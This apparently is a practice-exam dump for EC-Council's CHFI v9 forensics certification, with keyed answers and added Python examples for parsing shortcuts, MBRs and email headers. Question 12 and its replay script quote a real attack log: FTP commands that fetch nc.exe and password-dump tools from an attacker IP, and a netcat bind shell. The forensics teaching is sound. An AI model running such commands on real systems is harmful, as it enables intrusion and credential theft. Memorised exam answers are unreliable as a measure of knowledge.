Exam Code: 312-49v9 (Practice Exam Latest Test Questions VCE PDF)
Exam Name: ECCouncil Computer Hacking Forensic Investigator (V9)
Certification Provider: EC-Council
NEW QUESTION 1
A first responder is the person who arrives first at the crime scene and gains access to the victim's computer system after the incident. He or she is responsible for protecting the integrity of, and preserving, the evidence obtained from the crime scene. Which of the following is not a role of the first responder?
- A. Identify and analyze the crime scene
- B. Protect and secure the crime scene
- C. Package and transport the electronic evidence to forensics lab
- D. Prosecute the suspect in court of law
Answer: D
NEW QUESTION 2
You have been given the task to investigate web attacks on a Windows-based server.
Which of the following commands will you use to list the connections (sessions) this machine has opened with other systems?
- A. net session
- B. net use
- C. net config
- D. net share
Answer: B
Explanation:
net use lists the outbound connections the local host has made to remote shares and printers; net session lists the inbound sessions that other hosts have opened against this server. Both are volatile and worth capturing during live response on a compromised web server before it is powered down.
NEW QUESTION 3
Shortcuts are files with the .lnk extension that Windows creates when users open or pin items; they record the target that was accessed. These files provide you with information about:
- A. Files or network shares
- B. Running application
- C. Application logs
- D. System logs
Answer: A
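As an added example (not part of the dump or of EC-Council's material), the parser below decodes the fixed 76-byte ShellLinkHeader of a .lnk file and the StringData that follows it, which is where the target path and working directory (a local file or a network share) live. The sample shortcut is constructed inline with struct; the field layout follows the public MS-SHLLINK specification, and all function and variable names are my own.

```python
"""Decode a Windows shortcut (.lnk): the 76-byte ShellLinkHeader and the StringData
that names the target path and working directory (layout per MS-SHLLINK)."""
import struct
from datetime import datetime, timedelta, timezone

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-...-46}, little-endian
LINK_FLAGS = {0: "HasLinkTargetIDList", 1: "HasLinkInfo", 2: "HasName", 3: "HasRelativePath",
              4: "HasWorkingDir", 5: "HasArguments", 6: "HasIconLocation", 7: "IsUnicode"}
FILE_ATTRS = {0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM", 0x10: "DIRECTORY",
              0x20: "ARCHIVE", 0x80: "NORMAL"}
# StringData sections follow in this fixed order, each present only if its flag bit is set.
STRING_DATA = [(2, "name"), (3, "relative_path"), (4, "working_dir"),
               (5, "arguments"), (6, "icon_location")]
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_dt(ft):
    """FILETIME counts 100 ns intervals since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt):
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_lnk(data):
    (hdr_size, clsid, flags, attrs, ctime, atime, wtime, size,
     _icon, _show, _hotkey, _r1, _r2, _r3) = struct.unpack_from("<I16sIIQQQIIIHHII", data, 0)
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or LinkCLSID")
    info = {"flags": [n for b, n in LINK_FLAGS.items() if flags & (1 << b)],
            "attributes": [n for b, n in FILE_ATTRS.items() if attrs & b],
            "target_created": filetime_to_dt(ctime), "target_accessed": filetime_to_dt(atime),
            "target_modified": filetime_to_dt(wtime), "target_size": size}
    pos = 0x4C
    if flags & (1 << 0):                               # LinkTargetIDList: 2-byte size, then items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & (1 << 1):                               # LinkInfo: self-sized structure
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & (1 << 7))
    for bit, key in STRING_DATA:                       # CountCharacters + characters, no terminator
        if not flags & (1 << bit):
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        info[key] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return info


def build_sample_lnk():
    """Constructed sample, not a real artifact: a shortcut to a spreadsheet on a file share."""
    when = datetime(2020, 3, 2, 9, 15, 0, tzinfo=timezone.utc)
    flags = (1 << 3) | (1 << 4) | (1 << 7)             # HasRelativePath | HasWorkingDir | IsUnicode
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         dt_to_filetime(when), dt_to_filetime(when), dt_to_filetime(when),
                         48213, 0, 1, 0, 0, 0, 0)

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data("..\\Finance\\cheques_q1.xlsx") + string_data("\\\\fileserver\\finance")


if __name__ == "__main__":
    for key, value in parse_lnk(build_sample_lnk()).items():
        print(f"{key:16} {value}")
```

On a real shortcut the three timestamps and the size describe the target at the time the link was last written, which is why .lnk files are useful for showing that a user opened a document on a share even after the document itself is gone.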
NEW QUESTION 4
You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bit-stream image of the target computer, but have found no evidence. You suspect the files may never have been saved. What should you examine next in this case?
- A. The registry
- B. The swapfile
- C. The recycle bin
- D. The metadata
Answer: B
NEW QUESTION 5
George is a senior security analyst working for a state agency in Florida. His state's congress just passed a bill mandating every state agency to undergo a security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill requires that an IDS with a "time-based induction machine" be used. What IDS feature must George implement to meet this requirement?
- A. Pattern matching
- B. Statistical-based anomaly detection
- C. Real-time anomaly detection
- D. Signature-based anomaly detection
Answer: C
NEW QUESTION 6
Which of the following commands shows you the names of all open shared files on a server and number of file locks on each file?
- A. net session
- B. net file
- C. net config
- D. net share
Answer: B
Explanation:
net file lists every file currently open over the server's shares, with its ID, the user who opened it and the number of locks; net file <id> /close releases one. Capture its output before disconnecting a server from the network, because the list empties as soon as the client sessions drop.
NEW QUESTION 7
Paulette works for an IT security consulting company that is currently performing an audit for the firm ACE Unlimited. Paulette's duties include logging on to all the company's network equipment to ensure IOS versions are up to date and all other security settings are as stringent as possible. Paulette presents the following screenshot (the exhibit is not reproduced here) to her boss so he can inform the client about the changes that need to be made. From the screenshot, what changes should the client company make?
- A. The banner should include the Cisco tech support contact information as well
- B. The banner should have more detail on the version numbers for the network equipment
- C. The banner should not state "only authorized IT personnel may proceed"
- D. Remove any identifying numbers, names, or version information
Answer: D
NEW QUESTION 8
A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?
- A. Searching for evidence themselves would not have any ill effects
- B. Searching could possibly crash the machine or device
- C. Searching creates cache files, which would hinder the investigation
- D. Searching can change date/time stamps
Answer: D
NEW QUESTION 9
Network forensics can be defined as the sniffing, recording, acquisition and analysis of the network traffic and event logs in order to investigate a network security incident.
- A. True
- B. False
Answer: A
NEW QUESTION 10
Jones had been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the system for a period of three weeks. However law enforcement agencies were recording his every activity and this was later presented as evidence. The organization had used a virtual environment to trap Jones. What is a virtual environment?
- A. A system using Trojaned commands
- B. A honeypot that traps hackers
- C. An environment set up after the user logs in
- D. An environment set up before a user logs in
Answer: B
NEW QUESTION 11
When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
- A. Passive IDS
- B. Active IDS
- C. NIPS
- D. Progressive IDS
Answer: B
NEW QUESTION 12
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
- A. It is a local exploit where the attacker logs in using username johna2k
- B. There are two attackers on the system – johna2k and haxedj00
- C. The attack is a remote exploit and the hacker downloads three files
- D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
Answer: C
Explanation:
The commands were submitted through the RDS (msadcs.dll) request, so this is a remote exploit, not a local logon. The echo lines build an FTP script (ftpcom) that logs in to 213.116.251.162 as johna2k with password haxedj00 and fetches three files (nc.exe, pdump.exe and samdump.dll); ftp -s:ftpcom then runs that script. The last command starts netcat listening on port 6969 and binds the command interpreter to it; without -u that listener is TCP, so D is wrong. johna2k and haxedj00 are FTP credentials, not two attackers, so B is wrong. C is correct.
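As an added example (my code, not part of the dump), the script below replays the nine quoted commands the way a log reviewer would reason about them: it rebuilds the ftpcom script from the echo redirections, reads the credentials and the get targets out of it, and decodes the netcat switches so the listener's port and transport are explicit. The command list is a transcription of the excerpt above (the first line is quoted without echo, so the simulator treats it only as naming the FTP server); the regexes and function names are mine.

```python
"""Replay the RDS-delivered command sequence quoted above: rebuild the FTP script it
writes with echo, then summarise what it fetches and what it leaves listening."""
import re

# Transcription of the nine commands in the log excerpt (constructed list, same text).
LOGGED_COMMANDS = [
    "cmd1.exe /c open 213.116.251.162 >ftpcom",
    "cmd1.exe /c echo johna2k >>ftpcom",
    "cmd1.exe /c echo haxedj00 >>ftpcom",
    "cmd1.exe /c echo get nc.exe >>ftpcom",
    "cmd1.exe /c echo get pdump.exe >>ftpcom",
    "cmd1.exe /c echo get samdump.dll >>ftpcom",
    "cmd1.exe /c echo quit >>ftpcom",
    "cmd1.exe /c ftp -s:ftpcom",
    "cmd1.exe /c nc -l -p 6969 -e cmd1.exe",
]

CMD_RE = re.compile(r"^cmd1?\.exe\s+/c\s+(?P<body>.*?)(?:\s*(?P<redir>>>?)\s*(?P<file>\S+))?\s*$")
FTP_VERBS = {"open", "user", "get", "put", "mget", "binary", "ascii", "cd", "lcd", "quit", "bye"}
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_netcat(argv):
    """The nc switches that matter here: -l listen, -p port, -u UDP (absent => TCP), -e program."""
    opts = {"listen": "-l" in argv, "proto": "udp" if "-u" in argv else "tcp",
            "port": None, "exec": None}
    for i, arg in enumerate(argv):
        if arg == "-p" and i + 1 < len(argv):
            opts["port"] = int(argv[i + 1])
        elif arg == "-e" and i + 1 < len(argv):
            opts["exec"] = argv[i + 1]
    return opts


def read_ftp_script(lines):
    """ftp -s: script: optional 'open host', then the user and password lines, then verbs."""
    out = {"downloaded": []}
    plain = []
    for line in lines:
        words = line.split()
        if not words:
            continue
        if words[0] == "open" and len(words) > 1:
            out["ftp_server"] = words[1]
        elif words[0] == "get" and len(words) > 1:
            out["downloaded"].append(words[1])
        elif words[0] not in FTP_VERBS:
            plain.append(line)                 # bare lines answer the login prompts
    if len(plain) >= 2:
        out["credentials"] = (plain[0], plain[1])
    return out


def analyse(commands):
    files = {}                                 # redirect target -> lines written into it
    summary = {"ftp_server": None, "credentials": None, "downloaded": [], "listener": None}
    for cmd in commands:
        m = CMD_RE.match(cmd)
        if not m:
            raise ValueError(f"unrecognised command form: {cmd!r}")
        argv = m["body"].split()
        if m["redir"]:
            buf = files.setdefault(m["file"], [])
            if m["redir"] == ">":
                buf.clear()                    # '>' truncates, '>>' appends
            if argv[0] == "echo":
                buf.append(" ".join(argv[1:]))
        if argv[0] == "open":                  # quoted without echo: still names the FTP server
            ip = IPV4.search(m["body"])
            summary["ftp_server"] = ip.group(1) if ip else argv[1]
        elif argv[0] == "ftp":
            for arg in argv[1:]:
                if arg.startswith("-s:"):
                    summary.update(read_ftp_script(files.get(arg[3:], [])))
        elif argv[0] == "nc":
            summary["listener"] = parse_netcat(argv[1:])
    return summary


if __name__ == "__main__":
    for key, value in analyse(LOGGED_COMMANDS).items():
        print(f"{key:12} {value}")
```

The same pattern (reconstruct what the redirections wrote, then interpret the file) applies to any web-shell or command-injection log where the attacker stages a script one echo at a time.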
NEW QUESTION 13
In an echo data hiding technique, the secret message is embedded into a ____ as an echo.
- A. Cover audio signal
- B. Phase spectrum of a digital signal
- C. Pseudo-random signal
- D. Pseudo-spectrum signal
Answer: A
NEW QUESTION 14
You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?
- A. 0:1000, 150
- B. 0:1709, 150
- C. 1:1709, 150
- D. 0:1709-1858
Answer: B
Explanation:
DriveSpy accepts two range formats: Drive#:StartSector,SectorCount and Drive#:StartSector-EndSector (end inclusive). Drive numbers are zero based, so the primary drive is 0.
Answers B and D describe the same 150 sectors (1709 + 150 - 1 = 1858) and both formats are valid; the keyed answer is B, the start-plus-count form the question asks for.
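As an added example (not DriveSpy's code, and not from the dump), the snippet below normalises both DriveSpy range forms to a (drive, first, last) triple, shows that answers B and D address identical sectors, and carves those sectors out of a raw image so the arithmetic can be checked against real bytes. The image is constructed, with each sector stamped with its own LBA; the 512-byte sector size and the function names are my assumptions.

```python
"""DriveSpy-style sector ranges: parse 'drive:start,count' and 'drive:start-end',
compare them, and carve the sectors from a raw image."""
import re

SECTOR = 512                                      # assumed sector size
RANGE_RE = re.compile(r"^\s*(\d+):(\d+)\s*(?:,\s*(\d+)|-\s*(\d+))\s*$")


def parse_range(spec):
    """Return (drive, first_sector, last_sector_inclusive); drive numbers are zero based."""
    m = RANGE_RE.match(spec)
    if not m:
        raise ValueError(f"bad range spec: {spec!r}")
    drive, start, count, end = m.groups()
    drive, start = int(drive), int(start)
    if count is not None:
        count = int(count)
        if count < 1:
            raise ValueError("sector count must be positive")
        end = start + count - 1                   # count form: last = start + count - 1
    else:
        end = int(end)
        if end < start:
            raise ValueError("end sector precedes start sector")
    return drive, start, end


def same_range(a, b):
    return parse_range(a) == parse_range(b)


def extract(image, spec, drive=0):
    """Carve the sectors named by spec from a raw image of the given drive number."""
    d, first, last = parse_range(spec)
    if d != drive:
        raise ValueError(f"spec addresses drive {d}, image is drive {drive}")
    if last >= len(image) // SECTOR:
        raise ValueError("range runs past the end of the image")
    return image[first * SECTOR:(last + 1) * SECTOR]


def build_sample_image(sectors=2048):
    """Constructed image: each sector starts with its own LBA so carving is verifiable."""
    return b"".join(n.to_bytes(4, "little").ljust(SECTOR, b"\x00") for n in range(sectors))


def lba_of(sector_bytes):
    return int.from_bytes(sector_bytes[:4], "little")


if __name__ == "__main__":
    img = build_sample_image()
    chunk = extract(img, "0:1709, 150")
    print(parse_range("0:1709, 150"), parse_range("0:1709-1858"), same_range("0:1709, 150", "0:1709-1858"))
    print(len(chunk) // SECTOR, lba_of(chunk[:SECTOR]), lba_of(chunk[-SECTOR:]))
```

The off-by-one in the end-inclusive form is the usual trap: a range written as 1709-1859 copies 151 sectors, and a hash of the carve will not match the one recorded in the examiner's notes.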
NEW QUESTION 15
Which is not a part of environmental conditions of a forensics lab?
- A. Large dimensions of the room
- B. Good cooling system to overcome excess heat generated by the work station
- C. Allocation of workstations as per the room dimensions
- D. Open windows facing the public road
Answer: D
NEW QUESTION 16
In which step of the computer forensics investigation methodology would you run MD5 checksum on the evidence?
- A. Obtain search warrant
- B. Evaluate and secure the scene
- C. Collect the evidence
- D. Acquire the data
Answer: D
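As an added example (my code, not from the dump), the snippet below does what the acquisition step requires: hash the source, make the image, hash the image, and keep the record so the image can be re-verified before analysis and again before court. It hashes in one pass with MD5 and SHA-256 together, because MD5 is what the exam asks for while practical MD5 collisions mean a second algorithm is prudent. The copy is a stand-in for an imager, and the 3 MiB "drive" is constructed in a temporary directory.

```python
"""Acquisition hashing: digest source and image in one pass, record both, re-verify later."""
import hashlib
import io
import os
import shutil
import tempfile

CHUNK = 1 << 20
ALGOS = ("md5", "sha256")      # MD5 for the exam/record, SHA-256 because MD5 collisions are practical


def _digest(stream, algos):
    digests = {a: hashlib.new(a) for a in algos}
    for block in iter(lambda: stream.read(CHUNK), b""):     # chunked: images are larger than RAM
        for h in digests.values():
            h.update(block)
    return {a: h.hexdigest() for a, h in digests.items()}


def hash_bytes(data, algos=ALGOS):
    return _digest(io.BytesIO(data), algos)


def hash_file(path, algos=ALGOS):
    with open(path, "rb") as f:
        return _digest(f, algos)


def acquire(source, image):
    """Stand-in for an imager (dd, FTK Imager, ...): copy, then hash both ends and record it."""
    before = hash_file(source)
    shutil.copyfile(source, image)
    after = hash_file(image)
    return {"source": before, "image": after, "verified": before == after}


def verify(image, record):
    """Re-hash the image (before analysis, before court) against the acquisition record."""
    return hash_file(image) == record["image"]


def demo():
    with tempfile.TemporaryDirectory() as d:
        src, img = os.path.join(d, "suspect_disk.raw"), os.path.join(d, "suspect_disk.dd")
        with open(src, "wb") as f:
            f.write(bytes(range(256)) * (3 * 4096))          # constructed 3 MiB "drive"
        record = acquire(src, img)
        reverified = verify(img, record)
        with open(img, "r+b") as f:                           # flip one bit deep in the image
            f.seek(12345)
            b = f.read(1)
            f.seek(12345)
            f.write(bytes([b[0] ^ 0x01]))
        return {"verified": record["verified"], "reverified": reverified,
                "after_tamper": verify(img, record), "md5": record["image"]["md5"]}


if __name__ == "__main__":
    print(demo())
```

Hash the source through a write blocker before imaging, not only the image afterwards: a matching pair is what shows the copy is a bit-for-bit duplicate rather than merely internally consistent.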
NEW QUESTION 17
A hash injection (pass-the-hash) attack lets an attacker inject a stolen password hash into a local logon session and use that hash, rather than the plaintext password, to authenticate to network resources.
- A. True
- B. False
Answer: A
NEW QUESTION 18
Davidson Trucking is a small transportation company that has three local offices in Detroit Michigan. Ten female employees that work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?
- A. IT personnel
- B. Employees themselves
- C. Supervisors
- D. Administrative assistant in charge of writing policies
Answer: C
NEW QUESTION 19
Data is striped at a byte level across multiple drives and parity information is distributed among all member drives.
What RAID level is represented here?
- A. RAID Level0
- B. RAID Level 1
- C. RAID Level 3
- D. RAID Level 5
Answer: D
Explanation:
Distributed parity is what identifies RAID 5. Strictly, RAID 5 stripes at the block level; byte-level striping with a single dedicated parity drive is RAID 3. For an examiner the consequence is the same: a RAID 5 volume must be reassembled from the member images (all of them, or all but one using parity) with the correct chunk size and parity rotation before its file system can be read.
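As an added example (my code, not from the dump or any RAID implementation), the snippet below stripes data across member disks with rotating parity, rebuilds a lost member from the survivors with XOR, and reassembles the logical volume. It assumes the left-symmetric layout that Linux md uses by default; on a real array the chunk size and layout come from the controller or md metadata and are the first thing to establish.

```python
"""RAID 5 in miniature: stripe with rotating parity, rebuild a lost member by XOR,
reassemble the logical volume. Layout assumed: left-symmetric (Linux md default)."""


def xor_bytes(*blocks):
    out = bytearray(blocks[0])
    for b in blocks[1:]:
        for i, x in enumerate(b):
            out[i] ^= x
    return bytes(out)


def parity_disk(stripe_no, ndisks):
    """Left-symmetric: the parity chunk walks backwards one disk per stripe."""
    return (ndisks - 1 - stripe_no) % ndisks


def stripe(data, ndisks, chunk):
    per_stripe = chunk * (ndisks - 1)
    data = data + bytes((-len(data)) % per_stripe)           # pad the last stripe
    disks = [bytearray() for _ in range(ndisks)]
    for s in range(len(data) // per_stripe):
        base = s * per_stripe
        chunks = [data[base + i * chunk: base + (i + 1) * chunk] for i in range(ndisks - 1)]
        pd = parity_disk(s, ndisks)
        slot = [None] * ndisks
        slot[pd] = xor_bytes(*chunks)
        for i, c in enumerate(chunks):
            slot[(pd + 1 + i) % ndisks] = c                  # data fills the disks after parity, wrapping
        for d in range(ndisks):
            disks[d] += slot[d]
    return [bytes(d) for d in disks]


def rebuild(disks, missing, chunk):
    """Each chunk of the missing disk is the XOR of the same-offset chunks on the others."""
    ndisks = len(disks)
    length = len(next(d for d in disks if d is not None))
    out = bytearray()
    for off in range(0, length, chunk):
        out += xor_bytes(*(disks[d][off:off + chunk] for d in range(ndisks) if d != missing))
    restored = list(disks)
    restored[missing] = bytes(out)
    return restored


def reassemble(disks, chunk):
    """Read the data chunks of every stripe back in order, skipping the parity chunk."""
    ndisks = len(disks)
    out = bytearray()
    for s in range(len(disks[0]) // chunk):
        pd = parity_disk(s, ndisks)
        for i in range(ndisks - 1):
            out += disks[(pd + 1 + i) % ndisks][s * chunk:(s + 1) * chunk]
    return bytes(out)


if __name__ == "__main__":
    volume = bytes(range(256)) * 30                          # constructed 7680-byte volume
    members = stripe(volume, 4, 512)
    lost = list(members)
    lost[2] = None                                           # disk 2 failed / was not imaged
    print(reassemble(rebuild(lost, 2, 512), 512) == volume)
```

With the wrong layout or chunk size the rebuilt disk still XORs consistently but the reassembled volume is garbage, so validate by checking for a recognisable file system header at the start of the reassembled data before trusting it.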
NEW QUESTION 20
What is the first sector ("sector zero") of a hard disk?
- A. Master boot record
- B. System boot record
- C. Secondary boot record
- D. Hard disk boot record
Answer: A
Explanation:
On an MBR-partitioned disk, LBA 0 holds the boot code, the four-entry partition table at offset 446 and the 0x55AA signature at offset 510. It tells the examiner where each partition starts and how large it is, and by subtraction where the unallocated gaps are.
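As an added example (my code, not from the dump), the parser below reads a 512-byte MBR: it checks the 0x55AA signature, decodes the four partition entries, flags a GPT protective entry, and lists the sector ranges no partition claims, which is where hidden data and leftover earlier partitions are found. The MBR is constructed inline with two partitions and a deliberate gap between them; the partition-type names are the common ones and the function names are mine.

```python
"""Parse sector zero (the MBR): 446 bytes of boot code, four 16-byte partition entries
at offset 446, 0x55AA at offset 510. Also list the unallocated sector ranges."""
import struct

SECTOR = 512
PART_TYPES = {0x00: "empty", 0x05: "extended", 0x07: "NTFS/exFAT", 0x0B: "FAT32",
              0x0C: "FAT32 (LBA)", 0x0F: "extended (LBA)", 0x82: "Linux swap",
              0x83: "Linux", 0xEE: "GPT protective"}


def find_gaps(parts, total_sectors=None):
    """Sector ranges no entry claims: unallocated space worth carving."""
    gaps, cursor = [], 1                              # sector 0 is the MBR itself
    for p in sorted(parts, key=lambda p: p["first_lba"]):
        if p["first_lba"] > cursor:
            gaps.append((cursor, p["first_lba"] - 1))
        cursor = max(cursor, p["last_lba"] + 1)
    if total_sectors and cursor < total_sectors:
        gaps.append((cursor, total_sectors - 1))
    return gaps


def parse_mbr(sector, total_sectors=None):
    if len(sector) < SECTOR:
        raise ValueError("need a full 512-byte sector")
    if sector[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for slot in range(4):
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack_from(
            "<B3sB3sII", sector, 446 + 16 * slot)
        if ptype == 0:
            continue
        parts.append({"slot": slot, "bootable": status == 0x80, "type": ptype,
                      "type_name": PART_TYPES.get(ptype, f"0x{ptype:02x}"),
                      "first_lba": lba, "sectors": count, "last_lba": lba + count - 1})
    return {"disk_signature": struct.unpack_from("<I", sector, 440)[0],
            "partitions": parts,
            "gpt_protective": any(p["type"] == 0xEE for p in parts),
            "unallocated": find_gaps(parts, total_sectors)}


def build_sample_mbr():
    """Constructed MBR: a bootable NTFS partition, a 2048-sector gap, then a Linux partition."""
    mbr = bytearray(SECTOR)
    struct.pack_into("<I", mbr, 440, 0x1A2B3C4D)                  # disk signature
    entries = [(0x80, 0x07, 2048, 204800), (0x00, 0x83, 208896, 102400)]
    for slot, (status, ptype, lba, count) in enumerate(entries):
        struct.pack_into("<B3sB3sII", mbr, 446 + 16 * slot,
                         status, b"\xfe\xff\xff", ptype, b"\xfe\xff\xff", lba, count)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


if __name__ == "__main__":
    result = parse_mbr(build_sample_mbr(), total_sectors=400000)
    for p in result["partitions"]:
        print(p)
    print("unallocated:", result["unallocated"])
```

Pass the drive's real sector count so the trailing gap is reported; on a disk with a 0xEE entry, stop here and parse the GPT at LBA 1 instead.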
NEW QUESTION 21
What must be obtained before an investigation is carried out at a location?
- A. Search warrant
- B. Subpoena
- C. Habeas corpus
- D. Modus operandi
Answer: A
NEW QUESTION 22
An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out the data because CDs and DVDs are ____ media used to store large amounts of data and are not affected by the magnet.
- A. Magnetic
- B. Optical
- C. Anti-Magnetic
- D. Logical
Answer: B
NEW QUESTION 23
You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?
- A. The X509 Address
- B. The SMTP reply Address
- C. The E-mail Header
- D. The Host Domain Name
Answer: C
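As an added example (my code, not from the dump), the script below does what tracing a threatening message requires: it walks the Received: headers from the earliest hop to the last, pulls out each relaying host and the IP it connected from, and flags the common forgery tells (a Reply-To domain that differs from From, and hops that were not added by your own mail servers). The message is constructed with documentation address ranges; the own_domains parameter and the function names are my assumptions.

```python
"""Trace a message's path: Received: headers are prepended by each MTA, so the last
one is the earliest hop. Only the lines written by your own servers are trustworthy."""
import email
import re
from email.utils import parseaddr

# Constructed sample (RFC 5737 documentation addresses, not a real message).
SAMPLE = """\
Received: from mx1.example.org (mx1.example.org [203.0.113.5])
        by mail.example.com (Postfix) with ESMTPS id 4F2A1C; Tue, 3 Mar 2020 10:15:22 +0000
Received: from relay.freemail.example (relay.freemail.example [192.0.2.44])
        by mx1.example.org with ESMTP; Tue, 3 Mar 2020 10:15:20 +0000
Received: from [198.51.100.23] (unknown [198.51.100.23])
        by relay.freemail.example with ESMTPA id 77ab; Tue, 3 Mar 2020 10:15:18 +0000
From: "Accounts" <accounts@example.org>
Reply-To: collector@freemail.example
To: victim@example.com
Subject: Final warning
Message-ID: <20200303101518.77ab@relay.freemail.example>
Date: Tue, 3 Mar 2020 10:15:18 +0000

Pay by Friday or your files go public.
"""

RECEIVED = re.compile(r"from\s+(?P<from>\S+)(?:\s+\((?P<comment>[^)]*)\))?.*?\bby\s+(?P<by>\S+)")
IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def trace(raw, own_domains=("example.com",)):
    msg = email.message_from_string(raw)
    hops = []
    for header in reversed(msg.get_all("Received", [])):     # reversed: chronological order
        flat = " ".join(header.split())                      # unfold the header
        m = RECEIVED.search(flat)
        if not m:
            continue
        ip = IPV4.search(m["comment"] or "") or IPV4.search(m["from"])
        hops.append({"from": m["from"], "by": m["by"],
                     "ip": ip.group(1) if ip else None,
                     "date": flat.rsplit(";", 1)[1].strip() if ";" in flat else None,
                     # only a hop recorded by our own MTA is known to be genuine
                     "trusted": m["by"].endswith(own_domains)})
    from_addr = parseaddr(msg.get("From", ""))[1]
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    return {"hops": hops,
            "origin_ip": hops[0]["ip"] if hops else None,
            "from": from_addr, "reply_to": reply_to,
            "reply_to_mismatch": bool(reply_to)
                                 and reply_to.split("@")[-1] != from_addr.split("@")[-1],
            "message_id": msg.get("Message-ID")}


if __name__ == "__main__":
    result = trace(SAMPLE)
    for hop in result["hops"]:
        print(hop)
    print("origin:", result["origin_ip"], "reply-to mismatch:", result["reply_to_mismatch"])
```

The From: line is whatever the sender typed. The origin IP in the earliest Received: line is what you take to the provider (here the freemail operator) with the Message-ID and timestamp, and even that line can be forged by anyone who controls the sending server, which is why the hops your own MTA recorded are marked separately.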
NEW QUESTION 24
Which of the following steganography types hides the secret message within a legitimate carrier message, in a specifically designed pattern that the average reader will not notice?
- A. Open code steganography
- B. Visual semagrams steganography
- C. Text semagrams steganography
- D. Technical steganography
Answer: A
NEW QUESTION 25
In the context of the file deletion process, which of the following statements holds true?
- A. When files are deleted, the data is overwritten and the cluster marked as available
- B. The longer a disk is in use, the less likely it is that deleted files will be overwritten
- C. While booting, the machine may create temporary files that can destroy evidence
- D. Secure delete programs work by completely overwriting the file in one go
Answer: C
Explanation:
Deleting a file only marks its directory entry and clusters as reusable; the content stays on disk until something else is written there, so A is false. The longer the disk keeps being used, the more likely those clusters are reused, so B is false. Secure delete tools overwrite in one or more deliberate passes before releasing the space, not as a side effect of deletion, so D is false. Booting the machine writes logs, swap and temporary files into exactly that reusable space, which is why evidence drives are imaged through a write blocker rather than booted.
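As an added example (my code, not from the dump), the toy FAT-style volume below makes the explanation concrete: deleting a file flips the first byte of its directory entry to 0xE5 and frees its clusters in the FAT, but the data is untouched and can be recovered by assuming the clusters were contiguous; a later write reuses the lowest free cluster and destroys the first part of the deleted file; a secure delete wipes the clusters before freeing them. The cluster size, the cheque text and the class are all constructed for the demonstration.

```python
"""Toy FAT-style volume: deletion only flags the directory entry and frees the cluster
chain; the bytes stay until a later write reuses those clusters."""

CLUSTER = 64           # constructed: tiny clusters keep the sample readable
FREE, EOC = 0, 0xFFF   # FAT cell values: free cluster / end of chain
DELETED = 0xE5         # FAT marks a deleted entry by overwriting the first name byte


class ToyFat:
    def __init__(self, nclusters=16):
        self.fat = [FREE] * nclusters
        self.data = [bytearray(CLUSTER) for _ in range(nclusters)]
        self.dir = []                       # entries: name bytes, first cluster, size

    def _entry(self, name):
        return next(e for e in self.dir if e["name"] == name)

    def write(self, name, payload):
        need = max(1, -(-len(payload) // CLUSTER))
        free = [i for i, v in enumerate(self.fat) if v == FREE][:need]   # lowest free first
        if len(free) < need:
            raise OSError("volume full")
        for n, c in enumerate(free):
            self.data[c][:] = payload[n * CLUSTER:(n + 1) * CLUSTER].ljust(CLUSTER, b"\x00")
            self.fat[c] = free[n + 1] if n + 1 < need else EOC
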